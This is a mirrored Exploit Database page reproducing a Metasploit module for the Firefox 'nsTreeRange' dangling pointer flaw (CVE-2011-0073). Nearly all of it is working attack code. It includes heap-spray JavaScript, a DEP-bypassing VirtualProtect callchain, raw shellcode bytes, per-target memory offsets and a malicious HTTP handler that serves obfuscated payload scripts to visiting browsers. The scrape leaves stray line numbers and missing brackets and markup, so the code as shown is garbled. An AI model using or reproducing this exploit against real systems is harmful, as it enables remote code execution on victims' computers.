Mozilla Firefox – ‘nsTreeRange’ Dangling Pointer (Metasploit) (1)

Exploit Database
116 阅读

作者： Metasploit

日期： 2011-07-10
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/17520/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

# $Id: mozilla_nstreerange.rb 13148 2011-07-10 21:10:45Z sinn3r $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({

:ua_name => HttpClients::FF,

:ua_minver => "3.5",

:ua_maxver => "3.6.16",

:os_name => OperatingSystems::WINDOWS,

:javascript => true,

:rank => NormalRanking,

:vuln_test => "if (navigator.userAgent.indexOf('Windows NT 5.1') != -1 || navigator.javaEnabled()) { is_vuln = true; }",

})

def initialize(info = {})

super(update_info(info,

'Name' => 'Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability',

'Description'=> %q{

This module exploits a code execution vulnerability in Mozilla Firefox

3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.

By overwriting a subfunction of invalidateSelection it is possible to free the

nsTreeRange object that the function currently operates on.

Any further operations on the freed object can result in remote code execution.

Utilizing the call setup the function provides it's possible to bypass DEP

without the need for a ROP. Sadly this exploit is still either dependent

on Java or bound by ASLR because Firefox doesn't employ any ASLR-free

modules anymore.

'License'=> MSF_LICENSE,

'Author' =>

[

'regenrecht', # discovered and sold to ZDI

'xero', # Shenanigans

'Version'=> '$Revision: 13148 $',

'References' =>

[

['CVE','2011-0073'],

['OSVDB','72087'],

['BID','47663'],

['URL','http://www.zerodayinitiative.com/advisories/ZDI-11-157/'],

['URL','https://bugzilla.mozilla.org/show_bug.cgi?id=630919'],

['URL','http://www.mozilla.org/security/announce/2011/mfsa2011-13.html']

'DefaultOptions' =>

{

'EXITFUNC' => 'thread', # graceful exit if run in separate thread

'InitialAutoRunScript' => 'migrate -f',

'Payload'=>

{

'Space'=> 0x1000, # depending on the spray size it's actually a lot more

'BadChars' => "",

'Targets'=>

[

[ 'Auto (Direct attack against Windows XP, otherwise through Java, if enabled)',

{

'Platform' => 'win',

'Arch' => ARCH_X86,

'Auto' => true,

'Targets' => [['navigator.userAgent.indexOf("Windows NT 5.1") != -1', 1],

['navigator.javaEnabled()', 2]],

'UsesJava' => true

}

[ 'Firefox Runtime, fails with ASLR',

{

'Platform' => 'win',

'Arch' => ARCH_X86,

'VPOffset' => 0x781A91F8, # VirtualProtect

'LLOffset' => 0x781A9104, # LoadLibraryA

'GPAOffset' => 0x781A9014, # GetProcAddress

'UsesJava' => false

}

[ 'Java Runtime (7.10.3052.4), best against ASLR',

{

'Platform' => 'win',

'Arch' => ARCH_X86,

'VPOffset' => 0x7C37A140,

'LLOffset' => 0x7C37A0B8,

'GPAOffset' => 0x7C37A00C,

'UsesJava' => true

}

[ 'Java JVM (20.1.0.02)',

{

'Platform' => 'win',

'Arch' => ARCH_X86,

'VPOffset' => 0x6D9FC094,

'LLOffset' => 0x6D9FC110,

'GPAOffset' => 0x6D9FC188,

'UsesJava' => true

}

[ 'Java Regutils (6.0.260.3)',

{

'Platform' => 'win',

'Arch' => ARCH_X86,

'VPOffset' => 0x6D6C227C,

'LLOffset' => 0x6D6C2198,

'GPAOffset' => 0x6D6C2184,

'UsesJava' => true

}

'DefaultTarget'=> 0,

'DisclosureDate' => 'Feb 2 2011'

))

register_options(

[

OptBool.new('SEHProlog', [ true, 'Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit', true]),

OptBool.new('CreateThread', [ true, 'Whether to execute the payload in a new thread', true]),

], self.class

)

register_advanced_options(

[

OptInt.new('BaseOffset', [ true, 'The offset we hope to have overwritten with our heap spray', 0x0F000000 ]),

OptInt.new('SpraySize', [ true, 'The size of our heapspray blocks', 0x100000 ]),

OptInt.new('SprayCount', [ true, 'Number of blocks to be sprayed', 200 ]),

OptBool.new('SetBP', [ true, 'Set a breakpoint before payload execution', false ]),

OptBool.new('Crash', [ true, 'Usa an invalid offset to make the exploit crash (for debugging)', false ]),

], self.class

)

end

def prepare_payload(target, p)

base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1

spray_size = datastore['SpraySize']

esp_fix = 0

callchain = []

# Adding calls by hand is tedious, look at the bottom for an explanation of these values

add_call = Proc.new { |offset, arg1, arg2, direct |

next_offset = base_offset + (callchain.flatten.length*4)

callchain[-1][2] = next_offset if callchain.length > 0 # connect new frame to last one

if direct

callchain <<

[

next_offset + 0x4 - 8,

next_offset + 0x14,

arg1,

arg2,

next_offset + 0x18 - 0x70,

offset

]

else

callchain <<

[

next_offset + 0x4 - 8,

next_offset + 0x14,

arg1,

arg2,

offset - 0x70

]

end

}

add_call.call(target['LLOffset'], base_offset, 0) # use dummy LoadLibrary call to push valid fourth VirtualProtect argument on stack

add_call.call(target['VPOffset'], 0x10000, 0x40) # call VirtualProtect to make heap executable

add_call.call(0xDEADBEEF, 0, 0, true) # call our shellcode

callchain.flatten!

callchain[-1] = base_offset + (callchain.length*4) # patch last offset to point to shellcode located after callchain

esp_fix = 0x10

payload_buf = callchain.pack('V*')

payload_buf << "\xCC" if datastore['SetBP']

# make rest of shellcode run in separate thread

if datastore['CreateThread'] and target['LLOffset'] and target['GPAOffset']

payload_buf << "\x60\x31\xc0\x50\x50\x50\xe8\x00\x00\x00\x00\x5a\x89\xd6"

payload_buf << "\x52\x83\x04\x24\x3b\x83\xc2\x25\x83\xc6\x2e\x50\x50\x56"

payload_buf << "\x52\xff\x15#{[target['LLOffset']].pack('V')}\x50\xff\x15#{[target['GPAOffset']].pack('V')}"

payload_buf << "\xff\xd0\x61\xc2#{[esp_fix].pack('v')}\x6b\x65\x72\x6e\x65\x6c\x33\x32"

payload_buf << "\x00\x43\x72\x65\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00"

esp_fix = 0

end

# encapsulate actual payload in SEH handler

if datastore['SEHProlog']

payload_buf << "\x60\xe8\x00\x00\x00\x00\x83\x04\x24\x1a\x64\xff\x35\x00"

payload_buf << "\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x81\xec\x00\x01"

payload_buf << "\x00\x00\xeb\x12\x8b\x64\x24\x08\x64\x8f\x05\x00\x00\x00"

payload_buf << "\x00\x83\xc4\x04\x61\xc2"

payload_buf << [esp_fix].pack('v')

end

payload_buf << p

# controlled crash, to return to our SEH handler

payload_buf << "\x33\xC0\xFF\xE0" if datastore['SEHProlog']

payload_buf

end

def on_request_uri(cli, request)

if request.uri == get_resource() or request.uri =~ /\/$/

print_status("#{self.refname}: Redirecting #{cli.peerhost}:#{cli.peerport}")

redir = get_resource()

redir << '/' if redir[-1,1] != '/'

redir << rand_text_alphanumeric(4+rand(4))

redir << '.html'

send_redirect(cli, redir)

elsif request.uri =~ /\.html?$/

print_status("#{self.refname}: Sending HTML to #{cli.peerhost}:#{cli.peerport}")

xul_name = rand_text_alpha(rand(100)+1)

j_applet = rand_text_alpha(rand(100)+1)

html = <<-EOS

<html>

#{"<applet codebase=\".\" code=\"#{j_applet}.class\" width=0 height=0></applet>" if target['UsesJava']}

</html>

EOS

send_response(cli, html, { 'Content-Type' => 'text/html' })

elsif request.uri =~ /\.xul$/

print_status("#{self.refname}: Sending XUL to #{cli.peerhost}:#{cli.peerport}")

js_file= rand_text_alpha(rand(100)+1)

@js_func = rand_text_alpha(rand(32)+1)

xul = <<-EOS

<?xml version="1.0"?>

<?xml-stylesheet type="text/css"?>

</treerow>

</treeitem>

</treechildren>

</tree>

</window>

EOS

send_response(cli, xul, { 'Content-Type' => 'application/vnd.mozilla.xul+xml' })

elsif request.uri =~ /\.js$/

print_status("#{self.refname}: Sending JS to #{cli.peerhost}:#{cli.peerport}")

return if ((p = regenerate_payload(cli).encoded) == nil)

base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1

spray_size = datastore['SpraySize']

spray_count = datastore['SprayCount']

if not target['Auto']

escaped_payload = Rex::Text.to_unescape(prepare_payload(target, p))

shellcode_str = "var shellcode = unescape(\"#{escaped_payload}\");"

else

shellcode_str = target['Targets'].map{ |check, index|

"if (#{check}) {\n var shellcode = unescape(\"#{Rex::Text.to_unescape(prepare_payload(targets[index], p))}\");\n }"}.join(' else ')

shellcode_str << " else { return; }"

end

escaped_addr = Rex::Text.to_unescape([base_offset].pack("V"))

custom_js = <<-EOS

function #{@js_func}() {

container = new Array();

#{shellcode_str}

var delimiter = unescape("%udead");

var block = unescape("#{escaped_addr}");

while (block.length < 8)

block += block;

var treeSel = document.getElementById("tr").view.selection;

treeSel.clearSelection();

for (var count = 0; count < 30; ++count)

container.push(block + delimiter);

treeSel.select(0);

treeSel.tree = {

invalidateRange: function(s,e) {

treeSel.tree = null;

treeSel.clearSelection();

for (var count = 0; count < 10; ++count)

container.push(block + delimiter);

var big = unescape("%u4558%u4f52");

while (big.length < #{spray_size / 2})

big += big;

var pad = big.substring(0, #{(base_offset % spray_size)/2}) + shellcode;

var spray = pad + big.substring(pad.length + 2);

for (var count = 0; count < #{spray_count}; ++count)

container.push(spray + delimiter);

}

treeSel.invalidateSelection();

}

EOS

opts = {

'Symbols' => {

'Variables' => %w{ shellcode container delimiter block treeSel big pad spray count }

}

send_response(cli, obfuscate_js(custom_js, opts), { 'Content-Type' => 'application/x-javascript' })

end

# Handle the payload

handler(cli)

end

=begin

ESI points to shellcode

final call looks like this: CALL [[[[ESI]+8]]+70]

[ESI+10], [ESI+C] and [[ESI]+8] are pushed as arguments

[ESI+8] points to the next call frame, if there is one

104924BC/$56PUSH ESI

104924BD|.8B7424 08 MOV ESI,DWORD PTR SS:[ESP+8]

104924C1|>8B06/MOV EAX,DWORD PTR DS:[ESI]

104924C3|.8B40 08 |MOV EAX,DWORD PTR DS:[EAX+8]

104924C6|.85C0|TEST EAX,EAX

104924C8|.74 0C |JE SHORT xul.104924D6

104924CA|.FF76 10 |PUSH DWORD PTR DS:[ESI+10]

104924CD|.8B08|MOV ECX,DWORD PTR DS:[EAX]

104924CF|.FF76 0C |PUSH DWORD PTR DS:[ESI+C]

104924D2|.50|PUSH EAX

104924D3|.FF51 70 |CALL DWORD PTR DS:[ECX+70] # does the calling for us

104924D6|>8B76 08 |MOV ESI,DWORD PTR DS:[ESI+8]

104924D9|.85F6|TEST ESI,ESI

104924DB|.^ 75 E4 \JNZ SHORT xul.104924C1

104924DD|.5EPOP ESI

104924DE\.C2 0400 RETN 4

=end